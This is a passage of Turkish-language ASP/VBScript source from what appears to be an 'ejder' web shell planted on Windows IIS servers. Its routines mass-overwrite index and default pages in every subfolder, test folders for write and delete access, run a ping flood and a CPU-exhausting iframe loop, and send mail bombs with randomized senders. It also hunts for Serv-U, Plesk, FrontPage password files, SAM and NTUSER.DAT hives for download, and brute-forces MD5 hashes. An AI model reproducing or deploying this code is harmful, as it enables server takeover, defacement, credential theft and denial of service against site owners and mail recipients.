        Call MassCreater(yer&"\index.html",ej)
        Call MassCreater(yer&"\index.htm",ej)
        Call MassCreater(yer&"\index.asp",ej)
        Call MassCreater(yer&"\index.cfm",ej)
        Call MassCreater(yer&"\index.php",ej)
        Call MassCreater(yer&"\default.html",ej)
        Call MassCreater(yer&"\default.htm",ej)
        Call MassCreater(yer&"\default.asp",ej)
        Call MassCreater(yer&"\default.cfm",ej)
        Call MassCreater(yer&"\default.php",ej)
    end if
 else
     if hash9 ="copy" then
        MassCopier(yer&"\"&inject1) 
    else
        Call MassCreater(yer&"\"&inject1,ej)
    end if
 end if
 
a = Replace(FilePath&"?konum="&yer&"&Time="&time,"\","/")
If Err.Number = 0 Then
    response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
else
    response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&yer&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
end if
Err.Number = 0
Response.Flush
end sub

sub MassAttack(yer,ej,svk)
dim fastejder
on error resume next
Set f = FSO.GetFolder(yer)
Set fc = f.SubFolders
For Each f1 In fc

if hash3 = "ok" then
fastejder = f1.path&"\"&svk
else
fastejder = f1.path
end if

 if not islem = "ozel" then
     if hash9 = "copy" then
        MassCopier(fastejder&"\index.html")    
        MassCopier(fastejder&"\index.htm")
        MassCopier(fastejder&"\index.asp")
        MassCopier(fastejder&"\index.cfm")
        MassCopier(fastejder&"\index.php")
        MassCopier(fastejder&"\default.html")
        MassCopier(fastejder&"\default.htm")
        MassCopier(fastejder&"\default.asp")
        MassCopier(fastejder&"\default.cfm")
        MassCopier(fastejder&"\default.php")
    else
        Call MassCreater(fastejder&"\index.html",ej)    
        Call MassCreater(fastejder&"\index.htm",ej)
        Call MassCreater(fastejder&"\index.asp",ej)
        Call MassCreater(fastejder&"\index.cfm",ej)
        Call MassCreater(fastejder&"\index.php",ej)
        Call MassCreater(fastejder&"\default.html",ej)
        Call MassCreater(fastejder&"\default.htm",ej)
        Call MassCreater(fastejder&"\default.asp",ej)
        Call MassCreater(fastejder&"\default.cfm",ej)
        Call MassCreater(fastejder&"\default.php",ej)
    end if
 else
     if hash9 = "copy" then
        MassCopier(fastejder&"\"&inject1) 
    else
        Call MassCreater(fastejder&"\"&inject1,ej)     
    end if
 end if

    a = Replace(FilePath&"?konum="&fastejder&"&Time="&time,"\","/")
    If Err.Number = 0 Then
        response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastejder&" </a><font color=#C6FCBE> OK !! <font class=""k1"">ü</font></td></tr></table>"
    else
        response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&fastejder&" </a><font color=#FE7A84> Noo :( !! <font class=""k1"">û</font></td></tr></table>"
    end if
    Err.Number = 0
    Response.Flush
    
    if islem = "brute" then
        Call MassAttack(f1.path&"\",ej,svk)
    end if
Next
end sub

Sub tester(yer)
    on error resume next
    Set f = FSO.GetFolder(yer)
    Set fc = f.SubFolders
    For Each f1 In fc
    
    a = Replace(FilePath&"?konum="&f1.path&"&Time="&time,"\","/")
    response.write "<table width=""100%""><tr><td class=""kbrtm""><a href=# onClick=""openInMainWin('"&a&"');""> "&f1.path&" </a> "
    Response.Flush
    
    Err.Number = 0
    on error resume next
    Set f = FSO.GetFolder(f1.path)
    if Err.Number <> 0 then
        response.write "&nbsp;<b><font color=#FBE1D7>Oku :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"
    else
        response.write "&nbsp;<b><font color=#FAFEDE>Oku :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"
    end if
    set f = nothing
    Err.Number = 0
    Response.Flush
    
    on error resume next
    Set MyFile = FSO.CreateTextFile(f1.path & "test.ejder", True)
    MyFile.write " ejder Was Here... =) "
    set MyFile = Nothing
    if Err.Number <> 0 then
        response.write "&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"
    else
        response.write "&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"
    end if
    set f = nothing
    Err.Number = 0
    Response.Flush
    
    on error resume next
    FSO.DeleteFile f1.path & "test.ejder",true
    if Err.Number <> 0 then
        response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"
    else
        response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"
    end if
    set f = nothing
    Err.Number = 0
    Response.Flush
    
    response.write "</td></tr></table>"
    Response.Flush
    
    Call tester(f1.path)
    
    Next
end sub

Sub arama(yer)
on error resume next
    Set f = FSO.GetFolder(yer)
    Set fc = f.SubFolders
    For Each f1 In fc
        
        Set f2 = FSO.GetFolder(f1.path)
        Set fc2 = f2.Files
        For Each f12 In fc2
            
            if InStr(Ucase(f12.name),Ucase(hacked)) > 0 then
                downStr = "<table align=""center""><tr><td align=""center"" class=""kbrtm""><font class=""k2""><a href='"&FilePath&"?mode=6&file="&f12.path&"&konum="&konum&"&Time="&time&"'> Í </a></font>"
                if Ucase(hacked)="MDB" then
                    Response.Write downStr&"<font class=""k1"" ><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a></font> - <a href='"&dosyapath&"?mode=13&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" ["&f12.size&"]"&"</a></b><br></td></tr></table>"
                    i=i+1
                else
                    Response.Write downStr&"<font class=""k1""><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a><a href='"&FilePath&"?mode=10&file="&f12.path&"&konum="&konum&"&Time="&time&"'> ! </a></font> - <a href='"&dosyapath&"?mode=9&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" [<font color=yellow>"&f12.size&"</font>]"&"</a></b><br></td></tr></table>"
                    i=i+1
                end if
            end if
            Response.Flush
            
         next
         set f2 = nothing
         set fc2 = nothing
    
    Call arama(f1.path)
    
    next
       set f = nothing
    set fc = nothing

end sub

Sub Ping_Bomb_ejder(ejdersite,ejderpings,ejdertimeout,ejderbyte)
'///  by ejder. özel modüller ekledim =). Ne Mutlu TÜRKÜM DİYENE. 
 noattack = 1
 bonus = 0
 If ejderpings = "" Then ejderpings = 4
 If ejderpings = 0 Then ejderpings = 4
 If ejdertimeout = "" Then ejdertimeout = 750
 If InStr(ejdersite,"savsak") > 0 or InStr(ejdersite,"yagmurlu") or InStr(ejdersite,"com.tk") or InStr(ejdersite,"gov.tk") > 0 then noattack = 0
 If InStr(ejdersite,"cyber") > 0 or InStr(ejdersite,"tahri") > 0 or InStr(ejdersite,"hack") > 0 or InStr(ejdersite,"team") > 0 then bonus = 1

  response.write "<textarea style='width:100%;height:350;' >"
  if noattack = 1 then
  if bonus = 1 then 
      ejderpings = ejderpings * 20
      response.write "Ekstra *20 Bonus kazandın.      "
  end if

  Set Sh = CreateObject("WScript.Shell")
  if ejderbyte = "" then
  Set ExCmd = Sh.Exec("ping -n " & ejderpings _
   & " -w " & ejdertimeout & " " & ejdersite)
  else
  Set ExCmd = Sh.Exec("ping -n " & ejderpings _
   & " -w " & ejdertimeout & " " & ejdersite & " -l " & ejderbyte)
  end if
  depola = ExCmd.StdOut.ReadAll
  response.write depola
  Select Case InStr(ExCmd.StdOut.Readall,"TTL=")
   Case 0 IsConnectable = False
   Case Else IsConnectable = True
  End Select
  else
      response.write "Tasvip Etmediğimiz Bir siteye Saldırı yapıyorsun. Tekrarlama Kötü olur senin için. CIZZZ =) euheu by ejder                                                                                                           "
      response.write "Bu FSO sahibine,  gov.tk  ve com.tk sitelere karşı Koruma gerçekleştirildi. TÜRK TÜRK ü VURMAZ.. Kalleşlik yapma by ejder       "
      response.cookies("ejder") = "1"
      response.cookies("ejder").expires = now + 365
      count=0
  end if
  response.write "</textarea>"
  
End Sub

Sub Somurgen(filex,urlx)
for i=0 to CInt(filex)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"&i&".  Robot Bağlandı..</td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&urlx&"'></iframe>"
next
End Sub

Sub Ram_Cpu
on error resume next
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b> RAM & CPU FUcker for SERVER by ejder =) 1.0 </b></td></tr></table>"
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> ZARAR verme MEkanizması Devrede... </td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> Durdurmak için Pencereyi kapat. Her 2 Saniyede bir 3 program açılıyor...</td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <b>by ejder</b></td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=1'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=2'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=3'></iframe>"
response.write "<META http-equiv=refresh content=2;URL='"&FilePath&"?mode=31&file=1'>"
response.flush
end Sub

function TextYarat(intLen)
str=""
Randomize
for i=1 to intLen
    str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
next
TextYarat=str
end function

function MailSec()
dim strNewText,i
str=""
Randomize
mail = mail_array(round(rnd()*4))
uzanti = uzanti_array(round(rnd()*6))
str = "@"& mail &"."&  uzanti
MailSec = str
end function

function MailKorumasi(mailx)
MailKorumasi = 0
for i=0 to 9
    If Instr(UCASE(mailx), yasak_array(i)) > 0 Then
        MailKorumasi = 1
    end if
next
end function

Function MailYarat()
    MailYarat = TextYarat(8) & MailSec()
end function

Function TextYarat2()
    TextYarat2 = TextYarat(200)
end function

Function BaslikYarat()
    BaslikYarat = TextYarat(10)
end function

Sub MailBomber_by_ejder(alicix)
response.cookies("bilesen") = "1"
on error resume next
Set mailObj = Server.CreateObject("CDONTS.NewMail")
    mailObj.From    = MailYarat()
    mailObj.To      = alicix
    mailObj.Subject = BaslikYarat()
    mailObj.Body    = TextYarat2()
    mailObj.Send
Set mailObj = Nothing
if err <> 0 then
    on error resume next
    Set mailObj = Server.CreateObject("CDO.Message")
        mailObj.From = MailYarat()
        mailObj.To = alicix
        mailObj.Subject = BaslikYarat()
        mailObj.TextBody = TextYarat2()
        mailObj.Send
    Set mailObj = Nothing
    if err <> 0 then
        response.cookies("bilesen") = "0"
    end if
end if
End Sub

Sub yazorta(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsol(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub
Sub yazortaa(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsoll(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub

Function OS()
on error resume next
strComputer = "."
Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48)
For Each objItem in colItems
VerBig = Left(objItem.Version,3)
Next
Select Case VerBig
Case "5.0" OSystem = "W2K"
Case "5.1" OSystem = "XP"
Case "5.2" OSystem = "Windows 2003"
Case "4.0" OSystem = "NT 4.0**"
Case Else OSystem = "Unknown - probably Win 9x"
End Select
OS = OSystem
End Function

Sub FolderExistx(yer)
if FSO.FolderExists(yer) then
    yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taşı "" href='"&FilePath&"?mode=2&konum="&yer&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&yer&"&del="&yer&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&yer&"&Time="&time&"'> "&yer&"</a></b>")
end if
End Sub

Sub ejderServuRemote()
j=0
servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt")
for i=0 to 16
if FSO.FileExists(servu(i)) then
downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Remote olarak Sonuç bulunamadı. Gelişmiş aramayı seçiniz. <font face=Wingdings size=5>N</font> </font>")
end if
servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users")
for i=0 to 2
FolderExistx(servufolder(i))
next
End Sub

Sub ejderPleskRemote()
j=0
plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk/Mail Servers\Mail Enable\Config","c:\Program Files\swsoft\autsav.sav")
for i=0 to 3
if FSO.FolderExists(plesk(i)) then
yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taşı "" href='"&FilePath&"?mode=2&konum="&plesk(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a  title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&plesk(i)&"&del="&plesk(i)&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&plesk(i)&"&Time="&time&"'>"&plesk(i)&"</a></b>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamadı. <font face=Wingdings size=5>N</font> </font>")
end if
if FSO.FileExists(plesk(4)) then
downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
else
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Plesk'in  Autsav.sav Dosyası bulunamadı. <font face=Wingdings size=5>N</font> </font>")
end if 
End Sub

Sub ejderSam()
    Err.Number=0
    on error resume next
    Set MyFile = FSO.CreateTextFile("C:config\test.ejder", True)
    MyFile.write " ejder Was Here... =) "
    set MyFile = Nothing
    if Err.Number <> 0 then
        response.write "<center>&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"
    else
        response.write "<center>&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"
    end if
    Err.Number=0
    on error resume next
    FSO.DeleteFile "C:config\test.ejder",true
    if Err.Number <> 0 then
        response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;</center>"
    else
        response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;</center>"
    end if
    on error resume next
    url = "C:config\"
    Set f = FSO.GetFolder(url)
    if err <> 0 then
       url = "C:\WINDOWS\system32\config\"
    Set f = FSO.GetFolder(url)
    end if
    
    Set fc = f.Files
    For Each f1 In fc
       downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
       yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")
    Next
end Sub

Sub ejderVti_Pvt()
    j=0
    local = request.servervariables("APPL_PHYSICAL_PATH")
    vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd",""&local&"/vti_pvt/users.pwd",""&local&"/../vti_pvt/users.pwd",""&local&"/../../vti_pvt/users.pwd",""&local&"/../../../vti_pvt/users.pwd",""&local&"/vti_pvt/authors.pwd",""&local&"/../vti_pvt/authors.pwd",""&local&"/../../vti_pvt/authors.pwd",""&local&"/../../../vti_pvt/authors.pwd")
        for i=0 to 19
        if FSO.FileExists(vti(i)) then
            downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&vti(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&vti(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&vti(i)&"&islem="&vti(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
            yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>"&vti(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&vti(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
            j=j+1
        end if
    next
    if j = 0 then
        yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadı. Daha geniş Arama yapın by ejder <font face=Wingdings size=5>N</font> </font>")
    end if
end sub

Sub ejderNTUser(oturum)
    j=0
    ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini")
    for i=0 to 5
        if FSO.FileExists(ntuser(i)) then
            downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&ntuser(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&ntuser(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&ntuser(i)&"&islem="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
            yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>"&ntuser(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&ntuser(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
            j=j+1
        end if
    next
    if j = 0 then
        yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadı. Daha geniş Arama yapın by ejder <font face=Wingdings size=5>N</font> </font>")
    end if
end sub

Sub ejderRepair()
    Err.Number=0
    on error resume next
    Set MyFile = FSO.CreateTextFile("c:..\repair\test.ejder", True)
    MyFile.write " ejder Was Here... =) "
    set MyFile = Nothing
    if Err.Number <> 0 then
        response.write "<center>&nbsp;<b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;"
    else
        response.write "<center>&nbsp;<b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;"
    end if
    Err.Number=0
    on error resume next
    FSO.DeleteFile "c:..\repair\test.ejder",true
    if Err.Number <> 0 then
        response.write "&nbsp;<b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font>&nbsp;</center>"
    else
        response.write "&nbsp;<b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font>&nbsp;</center>"
    end if
    on error resume next
    url = "c:..\repair\"
    Set f = FSO.GetFolder(url)
    if err <> 0 then
       url = "C:\WINDOWS\repair\"
    Set f = FSO.GetFolder(url)
    end if
    
    Set fc = f.Files
    For Each f1 In fc
       downStr = "<a title=""Dosyayı Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayı Kopyala & Taşı "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Değiştir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
       yazorta("<a title="" İçini Görüntülemek için Tıkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayı Editlemek için Tıkla by ejder :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")
    Next
end Sub

Function kodolustur(aralik)
' belirtitiim aralıkda kod oluştuuyorurum. 01#01#01#01# başlangıç iiçin by ejder
    dim coding
    coding = ""
    for i=1 to CInt(aralik)
        coding = coding + "01#"
    next
    kodolustur = coding
End Function

Function diziolustur()
' Seçilen Charset leri burda birleştiriyorum by ejder
    Dim dizi
    dizi=""
    if not k1 = "" then dizi = dizi & karakter1
    if not k2 = "" then dizi = dizi & karakter2
    if not k3 = "" then dizi = dizi & karakter3
    if not k4 = "" then dizi = dizi & karakter4
    diziolustur = dizi
End Function

Function Sifreyarat(codex,aralik,dizix)
' Stirng kodunu sağdan çözümleyerek Şifre yaratıyor by Ej;DER
    dim hash
    dim sifre
    hash=""
    sifre=""
    i=CInt(aralik)
    Do While i>0 
        hash = CInt(Mid(codex,((i-1)*3)+1,2))  ' Sağdan sayıları alıyor.
        sifre = Mid(dizix,hash,1) & sifre
    i=i-1
    Loop 
    Sifreyarat = sifre
End Function

Function SonrakiAdim(codex,aralik,dizix)
' sonraki adıma hazırlık coded by ejder ;)
Dim hash
hash = ""
increment=0
goup=0
hashing = ""
i=CInt(aralik)
Do While i>0 
hash = CInt(Mid(codex,((i-1)*3)+1,2))  ' Sağdan sayıları alıyor.
' Carry out ı diğeirne giriş yap increment the next one
if hash => Len(dizix) then 
    increment = 1
    hash = 1
else if increment = 1 then
    hash = hash+1
    increment = 0
end if 
end if
' eğer ara1 hanelki şifreleme bitti ise diğeirne ıkamsı gerek ara1++
if i = 1 AND hash>= Len(dizix)-1 then goup=1
' Brute bitişini gösteriiyorum. 
if i = CInt(aralik) AND hash>= Len(dizix) AND ara1 = ara2 then getend=1   ''' BRUTE çıkışı bittiğini analıyorumm  GETEND =1 !!!!!!!!!!!!!
' hash i bir sonraki adıma hazırla
if i = CInt(aralik) then hash = hash + 1
'yeni hash numarası oluştur
if hash <10 then hash = "0" & hash
hashing = hash &"#" & hashing
i=i-1
Loop 
coding = hashing 
' eğerki goup =1 then hane atla ve yeni stireg olşutur
if goup = 1 then 
    coding = ""
    ara1 = CInt(aralik) + 1
    for j=1 to ara1
        coding = coding + "01#"
    next
end if
SonrakiAdim = coding
End Function

Sub Cookyaz(str1,str2,str3)
    if not str3 = "" then
        response.cookies(str1)("str2") = str3
        response.cookies(str1).expires = now+100
        session("say") = CInt(session("say")) + 1
    end if
End Sub
Sub HashFounded(str1,str2)
    if not request.cookies(str1)("sifre") = "" then
        yazsol("<b>Bulundu: "&request.cookies(str1)(str2)&"  ->> "&request.cookies(str1)("sifre")&" </b>")
        inject3 = CInt(inject3) + 1
    end if
End Sub
Sub hashyes(str1,str2,md5x,pwd)
    if not request.cookies(str1)(str2) = "" AND UCASE(request.cookies(str1)(str2)) = md5x then
        yazsol("BULDUuuuuuuuuuuuuuuu " & pwd & " -  " & request.cookies(str1)(str2)&"")
        response.cookies(str1)("sifre") = pwd
    end if
End Sub
Sub gelgit
    response.Write "<iframe style='width:0; height:0' src='"&murl&""&msite&"/"&mad&"/'></iframe>"
End sub
'*************************  ZORUNLU UPLOAD için GEREKLi =((  **********************************************************************************************
Class clsUpload
    Private mbinData
    Private mlngChunkIndex
    Private mlngBytesReceived
    Private mstrDelimiter
    Private CR
    Private LF
    Private CRLF
    Private mobjFieldAry()
    Private mlngCount

    Private Sub RequestData
        Dim llngLength
        mlngBytesReceived = Request.TotalBytes
        mbinData = Request.BinaryRead(mlngBytesReceived)
    End Sub

    Private Sub ParseDelimiter()
        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
    End Sub

    Private Sub ParseData()
        Dim llngStart
        Dim llngLength
        Dim llngEnd
        Dim lbinChunk
        llngStart = 1
        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
        While Not llngStart = 0
            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
